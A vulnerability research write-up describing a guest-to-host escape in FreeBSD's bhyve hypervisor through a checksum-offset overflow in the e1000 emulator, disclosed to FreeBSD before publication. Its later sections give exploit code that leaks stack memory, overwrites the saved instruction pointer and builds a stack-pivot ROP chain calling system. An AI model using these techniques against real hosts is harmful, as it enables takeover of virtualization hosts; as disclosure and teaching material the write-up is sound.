Escaping from bhyve
Introduction
Back in 2017, I wrote a paper in Phrack magazine about a VM escape in QEMU. The vulnerabilities were present in two network card device emulators: RTL8139 and PCNET. After the publication of Reno Robert's paper in the same Phrack issue about a couple of VM escapes in bhyve, I decided to audit the code of the available network device emulators.
The bug in the AMD PCNET emulator is related to a checksum inserted beyond the limit of the allocated buffer. I found a similar bug in the PCI E82545 emulator, where the UDP packet checksum is inserted at a controlled index. In the following, I will present how I turned a two-byte stack-based overflow into code execution.
Environment
As I don't have FreeBSD installed on my machine, I'm running the bhyve hypervisor inside a QEMU/KVM virtual machine with nested virtualization enabled. The host machine is running FreeBSD 13.0-RELEASE releng/13.0. The guest virtual machine also runs FreeBSD and is managed with vm-bhyve with the following configuration:
root@freelsd:~ # vm configure freebsd
loader="bhyveload"
cpu=1
memory=2048M
network0_type="e1000"
network0_switch="target"
network0_mac="58:9c:fc:0f:b4:44"
network1_type="virtio-net"
network1_switch="ssh"
network1_mac="58:9c:fc:04:49:ac"
disk0_type="virtio-blk"
disk0_name="disk0.img"
The E82545 emulator
Packet transmission
The function e82545_transmit (pci_e82545.c) is responsible for transmitting packets. The function iterates over the ring buffer of packet descriptors and fills a buffer of iovec structures.
There are three types of packet descriptors:
- E1000_TXD_TYP_C: This type is the context descriptor. The associated data structure (e1000_context_desc) encodes information such as the header and payload lengths as well as IP and TCP checksum offsets.
- E1000_TXD_TYP_D: This type is the data descriptor. The related data structure (e1000_data_desc) holds a pointer to the physical address of the data buffer.
- E1000_TXD_TYP_L: This type is the legacy data descriptor.
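To make the three descriptor types concrete, here is a minimal sketch of how a descriptor can be classified from its command/length dword. The bit values are the ones I recall from the e1000 headers and the helper name txdesc_type is hypothetical, so treat both as assumptions rather than as the emulator's exact code.

```c
#include <assert.h>
#include <stdint.h>

/* Bit values as recalled from the e1000 headers; treat them as assumptions. */
#define E1000_TXD_CMD_DEXT 0x20000000u /* extended descriptor format */
#define E1000_TXD_DTYP_C   0x00000000u /* context descriptor */
#define E1000_TXD_DTYP_D   0x00100000u /* data descriptor */

#define E1000_TXD_MASK  (E1000_TXD_CMD_DEXT | 0x00F00000u)
#define E1000_TXD_TYP_L 0u
#define E1000_TXD_TYP_C (E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_C)
#define E1000_TXD_TYP_D (E1000_TXD_CMD_DEXT | E1000_TXD_DTYP_D)

/* Hypothetical helper: classify a descriptor from its command/length dword. */
static uint32_t txdesc_type(uint32_t lower)
{
    /* Without the DEXT bit the descriptor uses the legacy layout. */
    if ((lower & E1000_TXD_CMD_DEXT) == 0)
        return E1000_TXD_TYP_L;
    /* Otherwise the DTYP field selects context or data. */
    return lower & E1000_TXD_MASK;
}
```

The low bits of the dword carry the length, which is why the helper masks them out before comparing against the type constants.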
Packets are submitted by a call to e82545_transmit_backend, which ends up invoking the following function:
/*
 * Called to send a buffer chain out to the tap device
 */
static ssize_t
tap_send(struct net_backend *be, const struct iovec *iov, int iovcnt)
{
    return (writev(be->fd, iov, iovcnt));
}
NIC setup
In order to trigger the vulnerability, we first need to set up the network card. The e1000 network adapters have several registers that can be configured through the in*() and out*() primitives (from machine/cpufunc.h). Please note that these functions do not have the same prototype as in the Linux header file sys/io.h: the port and data parameters are swapped in FreeBSD, and I got some crashes before figuring this out.
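The argument order pitfall is easy to illustrate. FreeBSD declares outl(port, data), whereas the Linux sys/io.h version is outl(value, port). The sketch below writes a device register through the I/O BAR using the FreeBSD order. The helper e1000_write_reg_io, the IOADDR/IODATA offsets (taken from my recollection of the Intel 8254x manual) and the recording stub are assumptions for illustration, not the code of the exploit.

```c
#include <assert.h>
#include <stdint.h>

/* Port write in FreeBSD argument order: outl(port, data). */
typedef void (*outl_fn)(uint32_t port, uint32_t data);

/* Offsets inside the I/O BAR (assumed from the 8254x manual). */
#define E1000_IOADDR 0x0u /* selects the device register */
#define E1000_IODATA 0x4u /* reads or writes the selected register */

/* Hypothetical helper: write val to device register reg via port I/O. */
static void e1000_write_reg_io(outl_fn out, uint32_t iobase,
    uint32_t reg, uint32_t val)
{
    out(iobase + E1000_IOADDR, reg);
    out(iobase + E1000_IODATA, val);
}

/* Stub standing in for the real outl(): records the last two writes. */
static uint32_t rec_port[2], rec_data[2];
static int rec_n;

static void record_outl(uint32_t port, uint32_t data)
{
    rec_port[rec_n % 2] = port;
    rec_data[rec_n % 2] = data;
    rec_n++;
}
```

On FreeBSD the stub would be replaced by a thin wrapper around outl() from machine/cpufunc.h. Swapping the two arguments compiles silently, which is what makes the mistake hard to spot.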
The only thing we need here is to configure the ring buffer of TX descriptors:
/* Allocate and zero the ring of TX descriptors. */
tx_size = tx_nb * sizeof(union e1000_tx_udesc);
tx_ring = aligned_alloc(PAGE_SIZE, tx_size);
memset(tx_ring, 0, tx_size);
for (int i = 0; i < tx_nb; i++) {
    /* One page-aligned data buffer per descriptor. */
    buffer = aligned_alloc(PAGE_SIZE, BUFF_SIZE);
    memcpy(buffer, packet, sizeof(packet));
    tx_buffer[i] = buffer;
    /* The device needs the guest-physical address of the buffer. */
    addr = gva_to_gpa(buffer);
    warnx("TX ring buffer at 0x%"PRIx64, addr);
    tx_ring[i].dd.buffer_addr = addr;
}
For each TX descriptor, we need to provide the physical address of the buffer holding the data to transmit. I didn't find any interface exposed to userland (e.g. there is no pagemap in /proc) to convert a virtual address into a physical address, so I wrote a small kernel module (pt.ko) that performs the resolution:
#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/sysproto.h>
#include <sys/systm.h>
#include <vm/vm.h>
#include <vm/pmap.h>
#include <vm/vm_map.h>
/* Syscall arguments: the address to resolve and where to store the result. */
struct pt_args
{
    vm_offset_t vaddr;
    uint64_t *res;
};

static int pt(struct thread *td, void *args)
{
    struct pmap *pmap;
    struct pt_args *user = args;
    vm_offset_t vaddr = user->vaddr;
    uint64_t *res = user->res;
    uint64_t paddr;

    /* Resolve vaddr in the address space of the calling process. */
    pmap = &td->td_proc->p_vmspace->vm_pmap;
    /* pmap_extract() returns 0 when vaddr is not mapped. */
    paddr = pmap_extract(pmap, vaddr);
    return copyout(&paddr, res, sizeof(uint64_t));
}

static struct sysent pt_sysent = {
    .sy_narg = 2,
    .sy_call = pt
};

/* Let the kernel pick the first free syscall slot. */
static int offset = NO_SYSCALL;

static int load(struct module *module, int cmd, void *arg)
{
    int error = 0;

    switch (cmd) {
    case MOD_LOAD:
        uprintf("loading syscall at offset %d\n", offset);
        break;
    case MOD_UNLOAD:
        uprintf("unloading syscall from offset %d\n", offset);
        break;
    default:
        error = EOPNOTSUPP;
        break;
    }
    return error;
}

SYSCALL_MODULE(pt, &offset, &pt_sysent, load, NULL);
The last step is to update the descriptor table address in the adapter:
warnx("disable TX");
e1000_tx_disable();
addr = gva_to_gpa(tx_ring);
warnx("update TX desc table");
e1000_write_reg(TDBAL, (uint32_t)addr); /* desc table addr, low bits */
e1000_write_reg(TDBAH, addr >> 32); /* desc table addr, hi 32-bits */
e1000_write_reg(TDLEN, tx_size); /* # descriptors in bytes */
e1000_write_reg(TDH, 0); /*desc table head idx */
warnx("enable TX");
e1000_tx_enable();
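The register values written above follow directly from the ring geometry. As a sanity check, the sketch below derives TDBAL, TDBAH and TDLEN from a guest-physical address and a descriptor count. The alignment rules (16-byte base, length in multiples of 128 bytes) come from my recollection of the Intel 8254x manual, and the structure and function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define TX_DESC_SIZE 16u /* every e1000 TX descriptor is 16 bytes */

struct tx_ring_regs {
    uint32_t tdbal; /* low 32 bits of the ring's guest-physical address */
    uint32_t tdbah; /* high 32 bits */
    uint32_t tdlen; /* ring size in bytes */
};

/* Hypothetical helper: derive register values, rejecting bad geometry. */
static bool tx_ring_regs_from(uint64_t gpa, uint32_t nb_desc,
    struct tx_ring_regs *out)
{
    uint64_t len = (uint64_t)nb_desc * TX_DESC_SIZE;

    if ((gpa & 0xf) != 0)             /* base must be 16-byte aligned */
        return false;
    if (len == 0 || (len % 128) != 0) /* length in multiples of 128 bytes */
        return false;
    out->tdbal = (uint32_t)gpa;
    out->tdbah = (uint32_t)(gpa >> 32);
    out->tdlen = (uint32_t)len;
    return true;
}
```

With 16-byte descriptors, the 128-byte rule means the descriptor count has to be a multiple of 8.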
The vulnerability
The vulnerability is present in the e82545_transmit function. As shown by the following snippet of code, if TCP segmentation offload is enabled (i.e. tso == 1), the packet header length (hdrlen) is retrieved from the packet context descriptor. The code ensures that the length value does not exceed a maximum size of 240 bytes and checks that the length is large enough to insert the VLAN tag and the IP and TCP checksums. However, in the case of a non-TCP packet (e.g. a UDP packet), there is no check on the checksum offset (ckinfo[1].ck_off). The missing check at [1] leads to an OOB read at [3] and an OOB write at [4]. The vulnerability allows an attacker to write controlled data (the computed checksum) beyond the limit of the packet header allocated on the stack at [2].
e82545_transmit(struct e82545_softc *sc, uint16_t head, uint16_t tail,
    uint16_t dsize, uint16_t *rhead, int *tdwb)
{
    /* ... */
    /* Simple non-TSO case. */
    if (!tso) {
        /* ... */
    } else {
        /* In case of TSO header length provided by software. */
        hdrlen = sc->esc_txctx.tcp_seg_setup.fields.hdr_len;
        if (hdrlen > 240) {
            WPRINTF("TSO hdrlen too large: %d", hdrlen);
            goto done;
        }
        if (vlen != 0 && hdrlen < ETHER_ADDR_LEN*2) {
            WPRINTF("TSO hdrlen too small for vlan insertion "
                "(%d vs %d) -- dropped", hdrlen,
                ETHER_ADDR_LEN*2);
            goto done;
        }
        if (hdrlen < ckinfo[0].ck_start + 6 ||
            hdrlen < ckinfo[0].ck_off + 2) {
            WPRINTF("TSO hdrlen too small for IP fields (%d) "
                "-- dropped", hdrlen);
            goto done;
        }
        if (sc->esc_txctx.cmd_and_length & E1000_TXD_CMD_TCP) {
            if (hdrlen < ckinfo[1].ck_start + 14 ||
                (ckinfo[1].ck_valid &&
                hdrlen < ckinfo[1].ck_off + 2)) {
                WPRINTF("TSO hdrlen too small for TCP fields "
                    "(%d) -- dropped", hdrlen);
                goto done;
            }
        } else {
            if (hdrlen < ckinfo[1].ck_start + 8) {
                WPRINTF("TSO hdrlen too small for UDP fields "
                    "(%d) -- dropped", hdrlen);
                // [1] Missing check on ckinfo[1].ck_off
                goto done;
            }
        }
    }
    /* Allocate, fill and prepend writable header vector. */
    if (hdrlen != 0) {
        // [2] Allocation of vulnerable buffer
        hdr = __builtin_alloca(hdrlen + vlen);
        /* ...*/
    }
    /* ... */
    /* Doing TSO. */
    if (ckinfo[1].ck_valid) /* Save partial pseudo-header checksum. */
        tcpcs = *(uint16_t *)&hdr[ckinfo[1].ck_off]; // [3] OOB Read
    /* ... */
    pv = 1;
    pvoff = 0;
    for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
        /* ... */
        /* Calculate checksums and transmit. */
        if (ckinfo[0].ck_valid) {
            *(uint16_t *)&hdr[ckinfo[0].ck_off] = ipcs;
            e82545_transmit_checksum(tiov, tiovcnt, &ckinfo[0]);
        }
        if (ckinfo[1].ck_valid) {
            *(uint16_t *)&hdr[ckinfo[1].ck_off] =
                e82545_carry(tcpsum); // [4] OOB Write
            e82545_transmit_checksum(tiov, tiovcnt, &ckinfo[1]);
        }
        e82545_transmit_backend(sc, tiov, tiovcnt);
    }
    /* ... */
}
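To spell out what is missing at [1], here is a minimal sketch of a validator for the non-TCP branch that mirrors the bound already applied to TCP packets. It is an illustration of the missing condition and not the patch committed by FreeBSD. The reduced structure ck_view, its field widths and the function name are assumptions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Reduced, assumed view of the checksum context used by the emulator. */
struct ck_view {
    bool    ck_valid; /* checksum insertion requested */
    uint8_t ck_start; /* first byte covered by the checksum */
    uint8_t ck_off;   /* where the 16-bit checksum is stored */
};

/* Hypothetical validator for the non-TCP (UDP) TSO branch. */
static bool tso_udp_header_ok(int hdrlen, const struct ck_view *ck)
{
    /* Existing check: the header must hold the 8-byte UDP header. */
    if (hdrlen < ck->ck_start + 8)
        return false;
    /* Check absent at [1]: the checksum slot must lie inside the header. */
    if (ck->ck_valid && hdrlen < ck->ck_off + 2)
        return false;
    return true;
}
```

For instance, a 32-byte header with a checksum offset of 0x90 passes the existing test but is rejected once the second condition is added.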
The vulnerability was reported to the FreeBSD security team on March 7th, 2022, and a security advisory was published one month after the initial report. After disclosing this vulnerability, I noticed that Reno Robert had reported a similar issue in 2019 (CVE-2019-5609). Unfortunately, the committed patch was incomplete and did not fix the issue.
VM escape
Memory leak
The vulnerability allows writing two controlled bytes at a controlled offset. However, the offset is only one byte wide, which limits the exploitation prospects. According to the layout of the stack displayed hereafter, the usual targets (saved instruction pointer, saved frame pointer) are out of reach from the allocated vulnerable buffer. Nonetheless, the hdr pointer can still be corrupted.
The hdr pointer is used in the segmentation loop as follows:
pv = 1;
pvoff = 0;
for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
    now = MIN(left, mss);
    /* Construct IOVs for the segment. */
    /* Include whole original header. */
    tiov[0].iov_base = hdr;
    tiov[0].iov_len = hdrlen;
    tiovcnt = 1;
    /* Include respective part of payload IOV. */
    for (nleft = now; pv < iovcnt && nleft > 0; nleft -= nnow) {
        nnow = MIN(nleft, iov[pv].iov_len - pvoff);
        tiov[tiovcnt].iov_base = iov[pv].iov_base + pvoff;
        tiov[tiovcnt++].iov_len = nnow;
        if (pvoff + nnow == iov[pv].iov_len) {
            pv++;
            pvoff = 0;
        } else
            pvoff += nnow;
    }
    /* ... */
    e82545_transmit_backend(sc, tiov, tiovcnt);
}
By adjusting the 2 low-order bytes of the hdr pointer, one can leak some portion of the stack content. We can get back the UDP packet containing the leaked memory if packet forwarding is enabled on the host (gateway_enable="YES" in /etc/rc.conf).
Running tcpdump on the guest machine will reveal a bunch of stack pointers.
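A two-byte overwrite of a little-endian pointer can only move it within the 64 KiB-aligned window it already points into. The sketch below models that constraint. The helper names are hypothetical, and the addresses in the usage note are made-up examples rather than values taken from a real bhyve process.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Result of replacing the two low-order bytes of a little-endian pointer. */
static uint64_t retarget_low16(uint64_t ptr, uint16_t low)
{
    return (ptr & ~(uint64_t)0xffff) | low;
}

/* A target is reachable only if it shares the upper 48 bits with ptr. */
static bool reachable_by_low16(uint64_t ptr, uint64_t target)
{
    return (ptr >> 16) == (target >> 16);
}
```

For example, a pointer at 0x7fffdfffde40 can be redirected to 0x7fffdfff1234 but not to 0x7fffdffe1234, which is why the leak is limited to stack memory close to the hdr buffer.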
Code execution
As surprising as it may seem, ASLR is not enabled by default on FreeBSD 13.0-RELEASE #0, so there is no need to leak the memory of the bhyve process to locate code.
As shown in the previous section, by corrupting the hdr pointer one can force the host to leak part of the bhyve process's stack. Corrupting the hdr pointer is especially convenient if we have more than one segment. For instance, we can alter the 2 low-order bytes of the hdr pointer in the first loop iteration and make use of the multiple writes that update the hdr buffer during the second iteration. The following snippet of code, which is responsible for updating the IP header, allows us to write a controlled DWORD at a controlled offset:
for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
    now = MIN(left, mss);
    /* ... */
    /* Update IP header. */
    if (sc->esc_txctx.cmd_and_length & E1000_TXD_CMD_IP) {
        /* IPv4 -- set length and ID */
        *(uint16_t *)&hdr[ckinfo[0].ck_start + 2] = htons(hdrlen - ckinfo[0].ck_start + now);
        *(uint16_t *)&hdr[ckinfo[0].ck_start + 4] = htons(ipid + seg);
    }
    /* ... */
}
Please note that the UDP header will also be updated (payload length, checksum), which may cause parasitic writes.
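The arithmetic behind the controlled DWORD can be checked in isolation. For a full-size segment, now equals mss, so the first word written is htons(hdrlen - ck_start + mss), and solving for mss gives the value to place in the context descriptor. The second helper assumes that the emulator loads ipid from the header with ntohs, which the excerpt does not show. All function names are hypothetical.

```c
#include <arpa/inet.h>
#include <assert.h>
#include <stdint.h>

/* Word the emulator stores at hdr[ck_start + 2] for a segment of size now. */
static uint16_t ip_len_written(uint16_t hdrlen, uint8_t ck_start, uint16_t now)
{
    return htons((uint16_t)(hdrlen - ck_start + now));
}

/* Choose mss so that the stored word equals want (low half of the DWORD). */
static uint16_t mss_for_word(uint16_t want, uint16_t hdrlen, uint8_t ck_start)
{
    return (uint16_t)(htons(want) - hdrlen + ck_start);
}

/* Word stored at hdr[ck_start + 4], assuming ipid = ntohs(header field). */
static uint16_t ip_id_written(uint16_t field, uint16_t seg)
{
    return htons((uint16_t)(ntohs(field) + seg));
}

/* Choose the header field so that the stored ID word equals want. */
static uint16_t ipid_field_for_word(uint16_t want, uint16_t seg)
{
    return htons((uint16_t)(ntohs(want) - seg));
}
```

With hdrlen = 32 and ck_start = 12, mss_for_word(w, 32, 12) reduces to htons(w) - 32 + 12. The write of interest happens during the second segment (seg = 1), hence the subtraction in ipid_field_for_word.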
Using the above modifications on the hdr buffer, we can for example overwrite the saved instruction pointer as follows:
/* corrupt saved rip */
hdrlen = 32;
hdroff = 0x90;
ipcss = 12;
tucss = 0;
mss = htons(POP_RBP & 0xffff) - hdrlen + ipcss; // WHAT_LOW
paylen = 2 * mss;
pktlen = paylen + hdrlen;
tx_cd.upper_setup.tcp_fields.tucss = tucss;
tx_cd.upper_setup.tcp_fields.tucse = tucss+1;
tx_cd.cmd_and_length = paylen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = mss;
write_off = SAVED_RIP_OFF - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(POP_RBP, 1); // WHAT_HIGH
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
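The WHERE line stores the complement of the desired value because what ends up on the stack is a checksum, not the raw data. My reading is that with tucss = 0 and tucse = tucss + 1 the checksummed range shrinks to two bytes, so the complemented one's-complement sum of that single word is the word's complement. The sketch below uses a generic RFC 1071 style checksum, not bhyve's own routine, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* RFC 1071 style checksum over native-endian 16-bit words (even length). */
static uint16_t inet_cksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    uint16_t w;

    assert(len % 2 == 0);
    for (size_t i = 0; i < len; i += 2) {
        memcpy(&w, buf + i, sizeof(w));
        sum += w;
    }
    while (sum >> 16) /* fold the carries back into the low 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Hypothetical helper: fill a 2-byte range so its checksum equals want. */
static void seed_cksum(uint8_t *buf, uint16_t want)
{
    uint16_t w = (uint16_t)~want;

    memcpy(buf, &w, sizeof(w));
}
```

Seeding the range with ~v therefore makes the inserted checksum equal to v, which turns the checksum insertion into a write of a chosen 16-bit value.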
One could be tempted at first sight to corrupt the saved frame pointer and make it point to the beginning of the original hdr buffer that stores our ROP chain. However, the function e82545_transmit is called from e82545_tx_thread, which does not return. So instead, we decided to use our relative OOB write primitive multiple times in order to build a ROP chain that calls system. Writing a full ROP chain is still challenging since the stack frame of the calling thread has limited space. We need to take care of the undesired writes to avoid writing beyond the stack limit allocated for the e82545_tx thread. To overcome these limitations, we can write a small chain that pivots the stack to the beginning of the original hdr buffer, where our payload that is responsible for calling system is stored.
In order to avoid mixing data used by the write primitive and data used as part of the ROP chain, we need to arrange our payload in the stack first. Prior to exploiting the relative OOB write primitive, we can send a first packet that forces an allocation of a large header (220 bytes is the maximum size that we can allocate), and use a smaller size for subsequent allocations.
Exploiting the OOB write primitive four times allows us to write our ROP chain made of POP RBP and LEAVE gadgets. This minimal stage allows pivoting the stack, as shown in the following picture, to the address of the initial allocation of the hdr buffer where the payload that calls system is located.
The exploit code is available in Synacktiv's GitHub repository.
Capsicum sandbox
The exploit works on bhyve built without the Capsicum sandbox (WITHOUT_CAPSICUM). The Capsicum sandbox will prevent running calc as the execve syscall (and many others) is filtered. I haven't invested time in finding a way to bypass the Capsicum sandbox. For those who are interested, I strongly encourage reading Reno Robert's Phrack paper, which presents a technique to bypass the sandbox.
Acknowledgement
I would like to thank the FreeBSD security team for handling the vulnerability.